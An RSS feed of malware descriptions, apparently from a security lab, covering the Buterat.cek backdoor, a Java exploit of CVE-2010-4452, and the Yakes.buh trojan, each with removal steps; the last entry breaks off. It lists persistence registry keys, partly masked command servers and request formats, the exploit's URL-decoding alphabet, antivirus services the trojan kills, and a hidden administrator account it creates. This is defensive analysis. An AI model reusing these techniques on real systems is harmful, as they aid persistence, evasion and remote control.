<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:atom="http://www.w3.org/2005/Atom" version="2.0">
	<channel>
		<title>Total Malware Info Feed</title>
		<link>http://www.totalmalwareinfo.com/</link>
		<description>Recent malware descriptions from Design and Test Lab.</description>
		<language>en-US</language>
		<copyright>Copyright (c) Design and Test Lab, LLC. All rights reserved.</copyright>
		<image>
			<url>http://www.mywikisite.com/rssicon.png</url>
			<title>Total Malware Info Feed</title>
			<link>http://www.totalmalwareinfo.com/</link>
		</image>
		<lastBuildDate>Sat, 26 May 2012 23:48:17 +0300</lastBuildDate>
		<generator>News Channel 1.64 (MediaWiki extension)</generator>
		<docs>http://www.rssboard.org/rss-specification</docs>
		<ttl>60</ttl>
				<managingEditor>webmaster@dnt-lab.com (Webmaster)</managingEditor>		<webMaster>webmaster@dnt-lab.com (Webmaster)</webMaster>
		<atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/TotalMalwareInfoFeed" /><feedburner:info xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" uri="totalmalwareinfofeed" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><item>
			<title>Backdoor.Win32.Buterat.cek</title>
			<link>http://www.totalmalwareinfo.com/eng/Backdoor.Win32.Buterat.cek</link>
			<description>&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;The description for &lt;b&gt;NewsChannel&lt;/b&gt; was created during beta-test of&amp;nbsp;&amp;laquo;Malware description on&amp;nbsp;demand&amp;raquo; service. Learn more about&amp;nbsp;at: &lt;a href="http://www.dnt-lab.com/en/services"&gt;&lt;nobr&gt;www.dnt-lab.com/en/services&lt;/nobr&gt;&lt;/a&gt;.&lt;/div&gt;
&lt;div style="float: right; margin-left: 10px; margin-bottom: 5px;"&gt;
&lt;table style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;tr style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;td colspan="2" style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px; background-color: #f8f8f8;"&gt;
&lt;div align="center"&gt;&lt;b&gt;NewsChannel&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;Last edited:
&lt;/p&gt;
&lt;/td&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;26.5.2012
&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p&gt;It is a malicious program that provides an attacker with remote access to an infected machine. It is a Windows application (PE-EXE file). Its size is 53,248 bytes. It is packed with UPX and an unknown packer. Its unpacked size is about 181 KB. It is written in C++.
&lt;/p&gt;&lt;p&gt;MD5: 6BD27CD6F02511AF244EB85FA32BB01F
&lt;/p&gt;&lt;p&gt;SHA1: BA245BA6AE566D8D8EC76836835846C8E7815F72
&lt;/p&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Installation"&gt;Installation&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;A copy of the backdoor can be created in the system with one of the following names:
&lt;/p&gt;
&lt;pre&gt;
%System%\netprotocol.exe
%APPDATA%\netprotocol.exe
&lt;/pre&gt;
&lt;p&gt;At the same time to counteract the anti-virus signature scanners, 2 bytes are modified in the created copy:
&lt;/p&gt;
&lt;div class="center"&gt;&lt;div class="floatnone"&gt;&lt;a href="http://www.totalmalwareinfo.com/eng/File:Buterat.cek.png" class="image"&gt;&lt;img alt="Buterat.cek.png" src="http://www.totalmalwareinfo.com/en/images/3/34/Buterat.cek.png" width="835" height="250" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;To automatically start the copy every time you start the system backdoor creates the system registry keys:
&lt;/p&gt;
&lt;pre&gt;
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
&amp;quot;Netprotocol&amp;quot; = &amp;lt;path to a created copy&amp;gt;
 
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
&amp;quot;Netprotocol&amp;quot; = &amp;lt;path to a created copy&amp;gt;
&lt;/pre&gt;
&lt;p&gt;Next, the created copy of the malware will be executed.
&lt;/p&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Payload"&gt;Payload&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;Once launched, the backdoor requests settings to configure its further work from an attacker's server. The received data is stored in the file:
&lt;/p&gt;
&lt;pre&gt;%WorkDir%\System.log
&lt;/pre&gt;
&lt;p&gt;In order to identify its presence in the system it creates the system registry key:
&lt;/p&gt;
&lt;pre&gt;
[HKLM\Software\Microsoft\Netprotocol]
&amp;quot;UniqueNum&amp;quot; = &amp;quot;&amp;lt;number&amp;gt;&amp;quot;
&lt;/pre&gt;
&lt;p&gt;where &amp;lt;number&amp;gt; - decimal number that is generated based on the current system time.
&lt;/p&gt;&lt;p&gt;Backdoor connects to the following servers to receive an attacker's commands:
&lt;/p&gt;
&lt;pre&gt;
http://kre****amdx.com/
http://kas****euk.com/
http://cl****na.com/
http://co****.be/
&lt;/pre&gt;
&lt;p&gt;Requests to the attacker's server may have the following format:
&lt;/p&gt;&lt;p&gt;- The request for a new attacker's command:
&lt;/p&gt;
&lt;pre&gt;&amp;lt;server&amp;gt;/njob.php?num=%s&amp;amp;rev=%s
&lt;/pre&gt;
&lt;p&gt;- The confirmation of execution of a regular command:
&lt;/p&gt;
&lt;pre&gt;
&amp;lt;server&amp;gt;/nconfirm.php?rev=%s&amp;amp;code=%s&amp;amp;param=%s&amp;amp;num=%s
&amp;lt;server&amp;gt;/zconfirm.php?rev=%s&amp;amp;code=%s&amp;amp;site=%s&amp;amp;searches=%s&amp;amp;clicks=%s&amp;amp;adver=%s&amp;amp;num=%s
&lt;/pre&gt;
&lt;p&gt;The backdoor is able to process commands with the following names:
&lt;/p&gt;
&lt;pre&gt;
JOB FILE
ZORKASITE
BEGUNFEED
REKLOSOFT
TEASERNET
SUPERPOISK
DIRECTST
LIVINETCH
PARKING
UPDATE
DOWNRUN
PRIORITYHOST
SETSTPAGE
COOKREJCT
DESTROY
&lt;/pre&gt;
&lt;p&gt;Depending on the received commands the backdoor can execute the following actions on the infected system:
&lt;/p&gt;
&lt;ul&gt;&lt;li&gt; It changes a start page, as well as page of default search engine in the browsers:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;
Internet Explorer
Opera
Mozilla Firefox
&lt;/pre&gt;
&lt;p&gt;For this purpose it changes the values of the following registry keys:
&lt;/p&gt;
&lt;pre&gt;
[HKCU\Software\Microsoft\Internet Explorer\Main]
&amp;quot;Start Page&amp;quot; = &amp;quot;http://webvolta.ru&amp;quot;

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3B}]
&amp;quot;DisplayName&amp;quot; = &amp;quot;Webvolta&amp;quot;
&amp;quot;URL&amp;quot; = &amp;quot;http://webvolta.ru/search.php?q={searchTerms}&amp;quot;
&lt;/pre&gt;
&lt;p&gt;Also the following files can be created:
&lt;/p&gt;
&lt;pre&gt;%System%\operaprefs_fixed.ini
&lt;/pre&gt;
&lt;p&gt;This file contains the following strings:
&lt;/p&gt;
&lt;pre&gt;
[User Prefs]
Startup Type = 2
Home URL = http://webvolta.ru
&lt;/pre&gt; 
&lt;pre&gt;%APPDATA%\Mozilla\Firefox\Profiles\searchplugins\webvolta.xml
&lt;/pre&gt;
&lt;p&gt;This file contains the following strings:
&lt;/p&gt;
&lt;pre&gt;
SearchPlugin xmlns=&amp;quot;http://www.mozilla.org/2006/browser/search/
ShortName
Webvolta
/ShortName
Description
Webvolta search.
/Description
InputEncoding
windows-1251
/InputEncoding
Url type=&amp;quot;text/html&amp;quot; method=&amp;quot;GET&amp;quot; template=&amp;quot;http://webvolta.ru/search.php?
Param name=&amp;quot;q&amp;quot; value=&amp;quot;{searchTerms}&amp;quot;/
/Url
/SearchPlugin
&lt;/pre&gt;
&lt;p&gt;Also the backdoor can create the file:
&lt;/p&gt;
&lt;pre&gt;%APPDATA%\Mozilla\Firefox\Profiles\&amp;lt;rnd&amp;gt;.default\user.js
&lt;/pre&gt;
&lt;p&gt;with the following contents:
&lt;/p&gt;
&lt;pre&gt;
user_pref(&amp;quot;dom.disable_window_status_change&amp;quot;, false);
user_pref(&amp;quot;startup.homepage_override_url&amp;quot;, &amp;quot;%s&amp;quot;);
user_pref(&amp;quot;browser.startup.page&amp;quot;, 1);
user_pref(&amp;quot;browser.startup.homepage&amp;quot;, &amp;quot;%s&amp;quot;);
user_pref(&amp;quot;browser.search.selectedEngine&amp;quot;, &amp;quot;Webvolta&amp;quot;);
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; It downloads files from the attacker's server and execute them.
&lt;/li&gt;&lt;li&gt; It embeds the java script designed to display ads from the resource "&lt;a href="http://begun.ru" class="external free"&gt;http://begun.ru&lt;/a&gt;" in the user-opened HTML-documents.
&lt;/li&gt;&lt;li&gt; It "cheats" sites usage statistics. The backdoor receives retrieval requests and links to resources which ratings are necessary to improve.
&lt;/li&gt;&lt;li&gt; Calling the function "InternetClearAllPerSiteCookieDecisions", it clears the contents of the branch in the registry:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\P3P\History]
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; Calling the function "InternetSetPerSiteCookieDecisionW", it rejects cookies for the domain "begun.ru".
&lt;/li&gt;&lt;li&gt; It updates its executable from an attacker's server. Additionally, it can download a file that is stored in its working directory as
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;%WorkDir%\netprotdrvss.exe
&lt;/pre&gt;
&lt;p&gt;Also, the backdoor updates its executable from an attacker's server being launched with the parameter:
&lt;/p&gt;
&lt;pre&gt;/Updatefile3
&lt;/pre&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Removal_Instructions"&gt;Removal Instructions&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;If your computer was not protected by an antivirus and was infected with this malware, follow these steps to remove it:
&lt;/p&gt;&lt;p&gt;1. Restart the computer in "Safe Mode" (at the beginning of loading press and hold «F8», then select «Safe Mode» at the Windows boot menu).
&lt;/p&gt;&lt;p&gt;2. Delete the following files:
&lt;/p&gt;
&lt;pre&gt;
%System%\netprotocol.exe
%APPDATA%\netprotocol.exe
%WorkDir%\System.log
%System%\operaprefs_fixed.ini
%APPDATA%\Mozilla\Firefox\Profiles\searchplugins\webvolta.xml
%APPDATA%\Mozilla\Firefox\Profiles\&amp;lt;rnd&amp;gt;.default\user.js
%WorkDir%\netprotdrvss.exe
&lt;/pre&gt;
&lt;p&gt;3. Delete the system registry keys:
&lt;/p&gt;
&lt;pre&gt;
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
&amp;quot;Netprotocol&amp;quot; = &amp;lt;path to a created copy&amp;gt;
 
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
&amp;quot;Netprotocol&amp;quot; = &amp;lt;path to a created copy&amp;gt;
 
[HKLM\Software\Microsoft\Netprotocol]
&amp;quot;UniqueNum&amp;quot; = &amp;quot;&amp;lt;number&amp;gt;&amp;quot;
&lt;/pre&gt;
&lt;p&gt;4. Restore the original registry key values:
&lt;/p&gt;
&lt;pre&gt;
[HKCU\Software\Microsoft\Internet Explorer\Main]
&amp;quot;Start Page&amp;quot;

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3B}]
&amp;quot;DisplayName&amp;quot;
&amp;quot;URL&amp;quot;
&lt;/pre&gt;
&lt;p&gt;5. Delete the original backdoor's file (its location on the infected computer will depend on how the program originally penetrated the victim machine).
&lt;/p&gt;&lt;p&gt;6. Clear the Temporary Internet Files directory, which may contain infected files.
&lt;/p&gt;&lt;p&gt;7. Perform a full system scan with an antivirus with updated databases.
&lt;/p&gt;
&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;&lt;b&gt;Can't find a description for a specific malware?&lt;/b&gt;&lt;br /&gt;
You can &lt;a href="http://www.dnt-lab.com/en/services"&gt;order a description for any computer malware, virus, trojan or worm&lt;/a&gt;.&lt;/div&gt;
</description>
			<pubDate>Sun, 25 Sep 2011 16:38:50 +0300</pubDate>
			<author>Playrhyba</author>
			<guid>http://www.totalmalwareinfo.com/eng/Backdoor.Win32.Buterat.cek</guid>
		</item>
		<item>
			<title>Exploit.Java.CVE-2010-4452.a</title>
			<link>http://www.totalmalwareinfo.com/eng/Exploit.Java.CVE-2010-4452.a</link>
			<description>&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;The description for &lt;b&gt;NewsChannel&lt;/b&gt; was created during beta-test of&amp;nbsp;&amp;laquo;Malware description on&amp;nbsp;demand&amp;raquo; service. Learn more about&amp;nbsp;at: &lt;a href="http://www.dnt-lab.com/en/services"&gt;&lt;nobr&gt;www.dnt-lab.com/en/services&lt;/nobr&gt;&lt;/a&gt;.&lt;/div&gt;
&lt;div style="float: right; margin-left: 10px; margin-bottom: 5px;"&gt;
&lt;table style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;tr style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;td colspan="2" style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px; background-color: #f8f8f8;"&gt;
&lt;div align="center"&gt;&lt;b&gt;NewsChannel&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;Last edited:
&lt;/p&gt;
&lt;/td&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;26.5.2012
&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p&gt;The malicious program is an exploit, which uses vulnerability &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4452" class="external text"&gt;CVE-2010-4452&lt;/a&gt; in Sun Java Runtime Environment (JRE) in the Oracle Java SE (up to version 6, 23rd Update) to download files from the Internet and execute them on the infected machine. It is s a Java-class (class-file). Its size is 3,570 bytes.
&lt;/p&gt;&lt;p&gt;MD5: 388B61750499659F8339F0FB6FDCA7A4
&lt;/p&gt;&lt;p&gt;SHA1: 0E60E6009B58331BF7E91329E0E4D33D0D33B803
&lt;/p&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Payload"&gt;Payload&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;The malware class "options" is an implementation of Java-applet designed to downloading files from passed URLs, as well as launching downloaded files It is launched from an infected HTML-page by using the "&amp;lt;APPLET&amp;gt;" tag. The list of URLs is passed to malicious applet as the tag parameter "uid" in encrypted form. Links in this list are separated by the symbols ";". Once launched, the exploit decrypts a received links by using the function "sicqsicT" declared in the malware class. During decoding, the following correspondence between input and output symbols is used: 
&lt;/p&gt;&lt;p&gt;Input symbols:
&lt;/p&gt;
&lt;pre&gt;7It?w8HBF45P:v6Z3ihx1bTlsr.OEcRU2aY&amp;amp;m=_Dy#kSN/-fp;dVWgQJjAenC9M%zXKG0qLou
&lt;/pre&gt;
&lt;p&gt;Output symbols:
&lt;/p&gt;
&lt;pre&gt;0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/.:_-?&amp;amp;=%#;
&lt;/pre&gt;
&lt;p&gt;The malicious applet uses the vulnerability CVE-2010-4452 for the purpuse of downloading files from the Internet to an infected computer. This vulnerability allows an attacker to bypass security settings of Java Sandbox and execute malicious code on a vulnerable system. The downloaded files are stored under random names in the temporary folder of the current user "%Temp%":
&lt;/p&gt;
&lt;pre&gt;%Temp%\&amp;lt;rnd&amp;gt;.exe
&lt;/pre&gt;
&lt;p&gt;where &amp;lt;rnd&amp;gt; - random fractional decimal numbers from 0 to 1.
&lt;/p&gt;&lt;p&gt;This file is launched after the successful download.
&lt;/p&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Removal_Instructions"&gt;Removal Instructions&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;If your computer was not protected by an antivirus and was infected with this malware, follow these steps to remove it:
&lt;/p&gt;&lt;p&gt;1. Delete the following files:
&lt;/p&gt;
&lt;pre&gt;%Temp%\.exe
&lt;/pre&gt;
&lt;p&gt;2. Update Sun Java JRE to the latest version.
&lt;/p&gt;&lt;p&gt;3. Perform a full system scan with an antivirus with updated databases.
&lt;/p&gt;
&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;&lt;b&gt;Can't find a description for a specific malware?&lt;/b&gt;&lt;br /&gt;
You can &lt;a href="http://www.dnt-lab.com/en/services"&gt;order a description for any computer malware, virus, trojan or worm&lt;/a&gt;.&lt;/div&gt;
</description>
			<pubDate>Sun, 18 Sep 2011 21:40:17 +0300</pubDate>
			<author>Playrhyba</author>
			<guid>http://www.totalmalwareinfo.com/eng/Exploit.Java.CVE-2010-4452.a</guid>
		</item>
		<item>
			<title>Trojan.Win32.Yakes.buh</title>
			<link>http://www.totalmalwareinfo.com/eng/Trojan.Win32.Yakes.buh</link>
			<description>&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;The description for &lt;b&gt;NewsChannel&lt;/b&gt; was created during beta-test of&amp;nbsp;&amp;laquo;Malware description on&amp;nbsp;demand&amp;raquo; service. Learn more about&amp;nbsp;at: &lt;a href="http://www.dnt-lab.com/en/services"&gt;&lt;nobr&gt;www.dnt-lab.com/en/services&lt;/nobr&gt;&lt;/a&gt;.&lt;/div&gt;
&lt;div style="float: right; margin-left: 10px; margin-bottom: 5px;"&gt;
&lt;table style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;tr style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;td colspan="2" style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px; background-color: #f8f8f8;"&gt;
&lt;div align="center"&gt;&lt;b&gt;NewsChannel&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;Last edited:
&lt;/p&gt;
&lt;/td&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;26.5.2012
&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p&gt;It is a trojan program that performs destructive actions on a user's computer. It is a Windows application (PE EXE-file). Its size is 57,480 bytes. It is written in C++.
&lt;/p&gt;&lt;p&gt;MD5: E9DC8EBABDC9A2FD571885909DA8CC0D
&lt;/p&gt;&lt;p&gt;SHA1: A7AC04CCC620A1703F20234CB27D11E70F49B4CC
&lt;/p&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Installation"&gt;Installation&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;The trojan copies its body to the Windows system directory. If it can't create a copy in the Windows system directory, the copy will be created in the temporary directory of the current user:
&lt;/p&gt;
&lt;pre&gt;
%System%\ms&amp;lt;rnd&amp;gt;.exe
%Temp%\ms&amp;lt;rnd&amp;gt;.exe
&lt;/pre&gt;
&lt;p&gt;where &amp;lt;rnd&amp;gt; - any sequence of numbers and letters of the alphabet, for example, "vgzcjw" or "ngszup".
In order to start automatically each time you start the system, the trojan creates a system service that runs its executable:
&lt;/p&gt;
&lt;pre&gt;[HKLM\System\CurrentControlSet\Services\Network Adapter Events]
&lt;/pre&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Payload"&gt;Payload&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;Once launched the trojan performs the following actions: 
&lt;/p&gt;
&lt;ul&gt;&lt;li&gt; It creates a unique identifier with the following name to control uniqueness of its process:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;msrdp#v3.2.4
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; It stops and deletes the following services:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;
Norton Antivirus Service
Panda Antivirus
Detector de OfficeScanNT
McAfee Framework Service
sharedaccess
OutpostFirewall
lnsfw1
sfilter
SmcService
UmxPol
UmxLU
UmxAgent
UmxCfg
kmxagent
kmxbig
kmxcfg
kmxfile
kmxfw
kmxids
kmxndis
kmxsbx
ZoneAlarm
vsmon
vsdatant
IswSvc
ISWKL
klif
klpf
klpid
kl1
WinDefend
MpsSvc
BFE
F-Secure Filter
F-Secure Gatekeeper
F-Secure HIPS
F-Secure Recognizer
fsbts
FSFW
F-Secure Gatekeeper Handler Starter
FSDFWD
FSMA
FSORSPClient
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; It creates a user named:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;TermUser
&lt;/pre&gt;
&lt;p&gt;and adds this user to the groups:
&lt;/p&gt;
&lt;pre&gt;
Administrators
Remote Desktop Users
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; It disables the display of the user's name in the Welcome Screen. For this purpose it creates the registry key:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;
[HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
&amp;quot;TermUser&amp;quot; = &amp;quot;0&amp;quot;
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; It scans removable drives, and copies the files which extensions are different from the following:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;
7z
ace
ain
arc
arh
ari
arj
ark
boo
bz2
bzip
bzip2
deb
dist
gzip
hpk
ice
lha
lzh
lzma
pack.gz
package
pak
pkg
r00
r01
r02
r03
r21
r30
rar
rpm
tar
tar.xz
tbz
tbz2
tgz
uha
wad
zip
zoo
aac
aax
ac3
acm
aif
aifc
aiff
amf
amr
ams
amz
ape
apf
cda
cdda
cdr
dts
dtshd
flac
m1a
m3u
m4a
m4b
m4p
m4r
mid
midi
miniusf
mka
mod
mp_
mp1
mp2
mp3
mpa
mpc
mpga
ogg
pcm
pls
ram
snd
voc
vox
wav
wave
wma
wpk
wproj
3g2
3gp
3gp2
3gpp
amv
amx
asf
asx
avi
d3v
divx
dv4
dvr-ms
dvx
flc
flv
hdmov
ifo
imoviep
m1pg
m1v
m21
m2a
m2t
m2ts
m2v
m4e
m4u
m4v
mj2
mjp
mjpg
mkv
mov
movie
mp21
mp2v
mp4
mp4v
mpeg
mpeg4
mpg
mpg2
msdvd
mswmm
ogm
ogv
ogx
playlis
prproj
qtch
rts
swf
vid
vob
vp3
vp6
vp7
wmmp
wmv
wmx
wp3
xvid
ac5
ac6
acr
catpart
exif
ilbm
ithmb
jiff
kodak
odif
picnc
pictclipping
pspimage
qtif
spiff
suniff
tddd
trif
xbm
xpm
agif
albm
apng
art
artwork
blkrt
bm2
bmp
djvu
icon
ico
jb2
jpe
jpeg
jpg
pcx
png
psd
sumo
thumb
tif
tiff
wbmp
gif
design
drwdot
emf
eps
epsf
fh10
fh11
ft10
ft11
slddrt
slddrw
svg
3dmf
3ds
3dxml
asat
blend
catproduct
dwg
md5anim
md5mesh
model
sldasm
sldprt
truck
openbsdcmd
bat
ex_
exe
exopc
gadget
jse
pif
vbs
vbscript
widget
dll
&lt;/pre&gt;
&lt;p&gt;Also this files must be smaller than 10 MB. The trojan saves the copies in the directory:
&lt;/p&gt;
&lt;pre&gt;%System%\storage\&amp;lt;rnd&amp;gt;\
&lt;/pre&gt;
&lt;p&gt;where &amp;lt;rnd&amp;gt; - volume serial number of a removable media.
&lt;/p&gt;
&lt;ul&gt;&lt;li&gt; It checks for a connection to the Internet by accessing the following URLs:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;
www.microsoft.com
www.yahoo.com
www.msn.com
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; To receive commands, the trojan sends the request to one of the following URLs:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;
z***b-went.info
oc***a-tcipty.com
oc***a-tc.info
h***j-emvbim.com
e***g-bjsyfjoqt.info
e***g-bjsyf.com
xl***ju-lrychj.info
xl***ju-lr.com
m***o-jragnrw.info
m***o-jra.com
f***hrc-tzgk.info
cq***oz-qwdhmor.com
cq***oz-qwd.info
vj***h-ajpwafh.com
vj***h-ajp.info
ky***wh-yelpu.com
ky***wh-y.info
dr***p-irxei.com
ao***m-foubfkmp.info
a***cm-foub.com
th***-qyhnuydf.info
&lt;/pre&gt;
&lt;p&gt;The sent request contains the information about a user's computer, such as system locale, serial number of the volume of the system drive, computer name, user name, information that the trojan gets from the following registry keys:
&lt;/p&gt;
&lt;pre&gt;
[HKLM\Software\Microsoft\Cryptography]
&amp;quot;MachineGuid&amp;quot;
 
[HKLM\Software\Microsoft\Windows NT\CurrentVersion]
&amp;quot;ProductId&amp;quot;
 
[HKLM\Software\Microsoft\Windows NT\CurrentVersion]
&amp;quot;DigitalProductId&amp;quot;
 
[HKLM\Software\Microsoft\Windows NT\CurrentVersion]
&amp;quot;InstallDate&amp;quot;
&lt;/pre&gt;
&lt;p&gt;as well as information about the installed security software from the following list:
&lt;/p&gt;
&lt;pre&gt;
Webroot
Sophos
Clam Antivirus
ClamWin
Avast 5
avast!
&lt;/pre&gt;
&lt;p&gt;that the trojan gets from the following keys in the system registry:
&lt;/p&gt;
&lt;pre&gt;[HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall]
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; The trojan saves its settings in an encrypted form in the registry key:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;[HKLM\Software\Microsoft\TermServMonitor]
&lt;/pre&gt;
&lt;p&gt;Following an attacker's command the trojan can download updates, download and execute components designed to provide access to the infected computer via RDP (Remote Desktop) protocol, as well as component for  logging user actions.
&lt;/p&gt;&lt;p&gt;The downloaded files are stored in the temporary directory of the current user:
&lt;/p&gt;
&lt;pre&gt;%Temp%\win&amp;lt;rnd1&amp;gt;.tmp
&lt;/pre&gt;
&lt;p&gt;where &amp;lt;rnd1&amp;gt; - any sequence of numbers and letters of the alphabet.
&lt;/p&gt;&lt;p&gt;If the downloaded file is an archive containing the components to install, the trojan will create the directory and place the extracted files to this directory:
&lt;/p&gt;
&lt;pre&gt;%Temp%\b&amp;lt;rnd2&amp;gt;\
&lt;/pre&gt;
&lt;p&gt;where &amp;lt;rnd2&amp;gt; - any sequence of numbers and letters of the alphabet.
&lt;/p&gt;&lt;p&gt;Then the trojan will install the downloaded components.
&lt;/p&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Removal_Instructions"&gt;Removal Instructions&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;If your computer was not protected by an antivirus and was infected with this malware, follow these steps to remove it:
&lt;/p&gt;&lt;p&gt;1. Using the system Task Manager terminate the trojan process.
&lt;/p&gt;&lt;p&gt;2. Delete the original trojan file (its location on the infected computer will depend on how the program originally penetrated the victim machine).
&lt;/p&gt;&lt;p&gt;3. Remove the following registry keys: 
&lt;/p&gt;
&lt;pre&gt;
[HKLM\Software\Microsoft\TermServMonitor]
 
[HKLM\System\CurrentControlSet\Services\Network Adapter Events]
 
[HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
&amp;quot;TermUser&amp;quot; = &amp;quot;0&amp;quot;
&lt;/pre&gt;
&lt;p&gt;4. Remove the following files and directories: 
&lt;/p&gt;
&lt;pre&gt;
%System%\ms&amp;lt;rnd&amp;gt;.exe
%Temp%\ms&amp;lt;rnd&amp;gt;.exe
%Temp%\win&amp;lt;rnd1&amp;gt;.tmp
%Temp%\b&amp;lt;rnd2&amp;gt;\
&lt;/pre&gt;
&lt;p&gt;5. Remove the following user from the system:
&lt;/p&gt;
&lt;pre&gt;TermUser
&lt;/pre&gt;
